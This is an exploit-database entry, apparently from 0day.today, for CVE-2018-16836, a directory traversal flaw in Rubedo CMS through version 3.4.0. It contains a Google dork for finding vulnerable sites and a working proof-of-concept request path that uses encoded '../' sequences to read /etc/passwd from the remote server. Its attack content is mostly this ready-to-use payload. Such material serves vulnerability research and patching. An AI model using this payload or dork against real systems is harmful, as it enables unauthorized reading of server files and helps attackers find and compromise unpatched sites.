id: 31087
date: 09/16/2018
title: Rubedo CMS 3.4.0 - Directory Traversal Vulnerability
author: Marouene Boubakri
cves: CVE-2018-16836

# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836
 
# PoC:
# Read /etc/passwd file from remote server
 
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'

#  0day.today [2023-03-27]  #